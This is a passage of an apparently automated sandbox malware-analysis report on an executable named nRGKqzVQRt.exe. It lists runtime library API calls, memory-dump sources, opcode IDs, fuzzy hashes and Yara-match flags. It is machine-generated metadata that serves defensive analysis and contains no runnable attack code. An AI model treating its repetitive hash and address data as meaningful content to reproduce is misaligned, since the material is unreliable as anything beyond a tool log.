                                                  • Instruction Fuzzy Hash: E121DA76A00109BFCB01EF95C891DDE7BB9FF08344F4081AAF515AB121DB35EA84CB95
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                  • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                                  • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                  • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                                  APIs
                                                  • _free.LIBCMT ref: 00678F88
                                                    • Part of subcall function 0067994F: HeapFree.KERNEL32(00000000,00000000,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?), ref: 00679965
                                                    • Part of subcall function 0067994F: GetLastError.KERNEL32(?,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?,?), ref: 00679977
                                                  • _free.LIBCMT ref: 00678F94
                                                  • _free.LIBCMT ref: 00678F9F
                                                  • _free.LIBCMT ref: 00678FAA
                                                  • _free.LIBCMT ref: 00678FB5
                                                  • _free.LIBCMT ref: 00678FC0
                                                  • _free.LIBCMT ref: 00678FCB
                                                  • _free.LIBCMT ref: 00678FD6
                                                  • _free.LIBCMT ref: 00678FE1
                                                  • _free.LIBCMT ref: 00678FEF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 8d7bb259e3ad232047728b53ffbe833894350ebe0894f4408949361a6be39974
                                                  • Instruction ID: 2db9758bc7578274ac2eaf52150c2e59e9553182313e4e292024449137135290
                                                  • Opcode Fuzzy Hash: 8d7bb259e3ad232047728b53ffbe833894350ebe0894f4408949361a6be39974
                                                  • Instruction Fuzzy Hash: AD219A76904109AFDB42EF94C882DDE7BBAFF08350F04816AF6599B121EB31DA44CF94
                                                  APIs
                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,004259BF), ref: 00424F0F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-3064271455
                                                  • Opcode ID: 949264a806388de4bf27def4d2db10dab23ff286707f966d8e08e15c152c9676
                                                  • Instruction ID: 77fc340e961970fd7467041676d8cf64c1629d7790bb492f2f63bf2a057de4fd
                                                  • Opcode Fuzzy Hash: 949264a806388de4bf27def4d2db10dab23ff286707f966d8e08e15c152c9676
                                                  • Instruction Fuzzy Hash: 7E518F70B0092ACBCF108F98FD481AEBBB4FF85304F918087D491A6254CB7D8966CB9D
                                                  APIs
                                                  • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                  • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                  • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2751267872-393685449
                                                  • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                  • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                  • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                  • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040AC16
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040AC39
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040AC59
                                                  • std::_Facet_Register.LIBCPMT ref: 0040ACBB
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040ACD3
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0040ACF6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                  • String ID: 0vv
                                                  • API String ID: 2081738530-455685883
                                                  • Opcode ID: 5c293808727baf58d0b78994ee596959b051c80a5145d9f106c0e32942314797
                                                  • Instruction ID: 42dd855bafadb820b2dbd196d0a58e7811000d19e1cacf42681462b4bf6c3cd6
                                                  • Opcode Fuzzy Hash: 5c293808727baf58d0b78994ee596959b051c80a5145d9f106c0e32942314797
                                                  • Instruction Fuzzy Hash: C7319FB1908219DFDB21DF54D980A6EB7B4FB04724F15423EE845773D1DB38A902CB8A
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066AE7D
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066AEA0
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0066AEC0
                                                  • std::_Facet_Register.LIBCPMT ref: 0066AF22
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0066AF3A
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0066AF5D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                  • String ID: 0vv
                                                  • API String ID: 2081738530-455685883
                                                  • Opcode ID: b885fbd9e08969445e8408afee0ad8d4617e431a29e76d4496445ec0c5d9d7bf
                                                  • Instruction ID: 05fac5cda9a666d82b836848b060e80483da825ee5397ee343ff8c322235300e
                                                  • Opcode Fuzzy Hash: b885fbd9e08969445e8408afee0ad8d4617e431a29e76d4496445ec0c5d9d7bf
                                                  • Instruction Fuzzy Hash: 2831ADB19046599FCB21DF94D880AAEB7B2FB44320F10416DE896B7381DB35AD01CBD6
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$___from_strstr_to_strchr
                                                  • String ID:
                                                  • API String ID: 3409252457-0
                                                  • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                  • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                                  • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                  • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0040CBE2
                                                  • __alloca_probe_16.LIBCMT ref: 0040CC0E
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0040CC4D
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040CC6A
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040CCA9
                                                  • __alloca_probe_16.LIBCMT ref: 0040CCC6
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040CD08
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040CD2B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                  • String ID:
                                                  • API String ID: 2040435927-0
                                                  • Opcode ID: 4226c0a309d17539fe735c567b77fc588b25ab9f355964044341ac6f8b5074c7
                                                  • Instruction ID: 0eef22ec5c0ed95795941b36f16f6703666d7858d80347e3b12d355d98e8a1b2
                                                  • Opcode Fuzzy Hash: 4226c0a309d17539fe735c567b77fc588b25ab9f355964044341ac6f8b5074c7
                                                  • Instruction Fuzzy Hash: 7851B07260020AEBEB205F65CC85FAB3BB9EF44754F15463AF914B6290DB789C05CB98
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(004383D4,00000FA0,?,?,0066D269), ref: 0066D297
                                                  • GetModuleHandleW.KERNEL32(00429060,?,?,0066D269), ref: 0066D2A2
                                                  • GetModuleHandleW.KERNEL32(004290A4,?,?,0066D269), ref: 0066D2B3
                                                  • GetProcAddress.KERNEL32(00000000,004290C0), ref: 0066D2C5
                                                  • GetProcAddress.KERNEL32(00000000,004290DC), ref: 0066D2D3
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0066D269), ref: 0066D2F6
                                                  • RtlDeleteCriticalSection.NTDLL(004383D4), ref: 0066D312
                                                  • CloseHandle.KERNEL32(004383D0,?,?,0066D269), ref: 0066D322
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID:
                                                  • API String ID: 2565136772-0
                                                  • Opcode ID: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                  • Instruction ID: 51aac6cee7c3164b87195e92fb5d8dbdec0a7444f7d4cdefc83c040c08fe93c5
                                                  • Opcode Fuzzy Hash: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                  • Instruction Fuzzy Hash: 03017531B427219BDB311B74BC19BAF7A9D9B44F41B55403AFE04E2390DFB5C8068AAD
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  • _free.LIBCMT ref: 0067870E
                                                  • _free.LIBCMT ref: 00678727
                                                  • _free.LIBCMT ref: 00678765
                                                  • _free.LIBCMT ref: 0067876E
                                                  • _free.LIBCMT ref: 0067877A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast
                                                  • String ID: PrC
                                                  • API String ID: 3291180501-1629617404
                                                  • Opcode ID: c79852c48309a195d8900170292c7256d956fbc528769400df0c6a89e8965495
                                                  • Instruction ID: 6c88fee4445271db11909f8de891d6e696e06c6561f768d1a5aa2ff2d82723ea
                                                  • Opcode Fuzzy Hash: c79852c48309a195d8900170292c7256d956fbc528769400df0c6a89e8965495
                                                  • Instruction Fuzzy Hash: B7B12D759012199FDB24DF14C888AADB7B6FB48314F6085ADE84DA7350DB70AE90CF54
                                                  APIs
                                                  • __alloca_probe_16.LIBCMT ref: 0041B9CE
                                                  • __alloca_probe_16.LIBCMT ref: 0041BA94
                                                  • __freea.LIBCMT ref: 0041BB00
                                                    • Part of subcall function 0041A395: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                  • __freea.LIBCMT ref: 0041BB09
                                                  • __freea.LIBCMT ref: 0041BB2C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                  • String ID: uA
                                                  • API String ID: 1423051803-3888042258
                                                  • Opcode ID: 4828b68452414b976fce63ca4c703ddfeade55bfdfb8d09f6675fe12ed361c88
                                                  • Instruction ID: ced852eb499a8acaff1ad66fc4d965fe1516489bf7db7eeb17bdd08576ef726b
                                                  • Opcode Fuzzy Hash: 4828b68452414b976fce63ca4c703ddfeade55bfdfb8d09f6675fe12ed361c88
                                                  • Instruction Fuzzy Hash: 5151B272500216AFDB219F66CC81EFF3AA9EF44754F25012AFD04A7240EB39DD9186E8
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __setlocale_get_all_strcspn_strlen_strncmp_strpbrk
                                                  • String ID:
                                                  • API String ID: 3252769141-0
                                                  • Opcode ID: 3604c2c1142ad9c356fbba4aa7a1f437c6fbe87c0272fb372a3ded3c1f6cbc27
                                                  • Instruction ID: fcee0553ea2e584bc3324afe79ac2d919ecb72e67bda044fa3c159748f13b20e
                                                  • Opcode Fuzzy Hash: 3604c2c1142ad9c356fbba4aa7a1f437c6fbe87c0272fb372a3ded3c1f6cbc27
                                                  • Instruction Fuzzy Hash: 4D51B875D002159EFF309A718C81BAB77B4AB41354F1444BBE94DE2262DB388EC98B19
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00403DA3
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403DEF
                                                  • __Getctype.LIBCPMT ref: 00403E08
                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00403E24
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00403EB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                  • String ID: bad locale name
                                                  • API String ID: 1840309910-1405518554
                                                  • Opcode ID: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                  • Instruction ID: 735bfd9e15749c96a7d30fe23bfbaee7cab1fe25536061823035921e9fb647b7
                                                  • Opcode Fuzzy Hash: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                  • Instruction Fuzzy Hash: E25180B1D003489BDF10DFA5D8457CEBBB8AF14315F14426AEC15BB381E779AA08C799
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066400A
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00664056
                                                  • __Getctype.LIBCPMT ref: 0066406F
                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0066408B
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00664120
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                  • String ID: 0vv
                                                  • API String ID: 1840309910-455685883
                                                  • Opcode ID: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                  • Instruction ID: 4027ce197e62b4a7407801f3332779d4fe47e6b22debe8c5262841b6e83afbda
                                                  • Opcode Fuzzy Hash: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                  • Instruction Fuzzy Hash: D25191B1D003589BEB10DFE4D8457DEFBB9AF14310F148129E809AB341EB75EA48CB95
                                                  APIs
                                                  • __RTC_Initialize.LIBCMT ref: 1000291D
                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                  • String ID:
                                                  • API String ID: 2442719207-0
                                                  • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                  • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                  • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                  • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 0040FB57
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0040FB5F
                                                  • _ValidateLocalCookies.LIBCMT ref: 0040FBE8
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0040FC13
                                                  • _ValidateLocalCookies.LIBCMT ref: 0040FC68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                  • Instruction ID: feac5375391b8ac6f8c542b9474111b56147410f227dd59f06f236b9ab0aef11
                                                  • Opcode Fuzzy Hash: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                  • Instruction Fuzzy Hash: DB41B834A002089BCF20DF69C891A9E7BB4BF44358F14807BE8156B7D2D779EA59CF94
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                  • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                  • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                  • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                  • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                  • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\nRGKqzVQRt.exe$VA
                                                  • API String ID: 0-1958379148
                                                  • Opcode ID: bbc246354933274b12cc74a321791b42bb805874b1c62c20345f16d1b2f24b5d
                                                  • Instruction ID: 2b41407daedabdefeb68af409a406bd3dd60cc27b104900d0df700e292202cc0
                                                  • Opcode Fuzzy Hash: bbc246354933274b12cc74a321791b42bb805874b1c62c20345f16d1b2f24b5d
                                                  • Instruction Fuzzy Hash: A421B075604105AF9B20BF638C419EB77ADEF013A8710852BFD2587251E739EC819768
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                  • Instruction ID: a0b7181f714cca58eaa4ddaccdd8282d036359da2c95a804dd2d27402f6bcf77
                                                  • Opcode Fuzzy Hash: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                  • Instruction Fuzzy Hash: 2A212BB1A21224ABCB314B259C51BEF77689F417A0F21012EED46A7390DB38ED41C5ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                  • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                  • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                  • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                  APIs
                                                    • Part of subcall function 0041FE51: _free.LIBCMT ref: 0041FE76
                                                  • _free.LIBCMT ref: 00420153
                                                    • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                    • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                  • _free.LIBCMT ref: 0042015E
                                                  • _free.LIBCMT ref: 00420169
                                                  • _free.LIBCMT ref: 004201BD
                                                  • _free.LIBCMT ref: 004201C8
                                                  • _free.LIBCMT ref: 004201D3
                                                  • _free.LIBCMT ref: 004201DE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: cdd5e4471268dfd21d5239b5f7fa74d2fa29ef36221d2afbd4b55f52868d9946
                                                  • Instruction ID: 19dd4c8c7b65d2d86164fed46a4597e2e19d2a81908c0efd60b677630b23bdd7
                                                  • Opcode Fuzzy Hash: cdd5e4471268dfd21d5239b5f7fa74d2fa29ef36221d2afbd4b55f52868d9946
                                                  • Instruction Fuzzy Hash: 75112E71681704AADA20B7B2CC56FCB779C9F00B04F40082BF29966073DA7DF9898659
                                                  APIs
                                                    • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                                  • _free.LIBCMT ref: 1000C60D
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 1000C618
                                                  • _free.LIBCMT ref: 1000C623
